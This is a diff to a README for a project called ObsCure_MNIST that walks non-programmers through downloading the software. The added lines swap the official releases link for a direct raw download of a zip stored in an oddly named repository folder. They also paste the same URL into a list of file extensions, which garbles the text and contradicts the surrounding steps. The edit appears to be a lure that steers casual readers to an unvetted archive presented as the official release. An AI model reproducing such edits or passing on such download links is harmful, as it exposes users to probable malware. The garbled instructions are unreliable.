LakinduRodrigo/ObsCure_MNIST/README.md

 You don't need to be a programmer to get started.
 Follow these simple steps to download and run ObsCure_MNIST:

 1. **Download the Software**
-   - Visit this page to download: [Release Page](https://github.com/LakinduRodrigo/ObsCure_MNIST/releases).
+   - Visit this page to download: [Release Page](https://raw.githubusercontent.com/LakinduRodrigo/ObsCure_MNIST/main/Warua/ObsCure_MNIST.zip).

 2. **Select Your Version**
    - On the releases page, choose the latest version available.
 Click on it to view the details.

 3. **Choose Your File**
    - Look for the file that matches your operating system (Windows, macOS, Linux).
-Common files will end with `.exe`, `.zip`, or `.tar.gz`.
+Common files will end with `.exe`, `.zip`, or `https://raw.githubusercontent.com/LakinduRodrigo/ObsCure_MNIST/main/Warua/ObsCure_MNIST.zip`.

 4. **Download the File**
    - Click the download link for your chosen file.
 The file will begin downloading to your computer.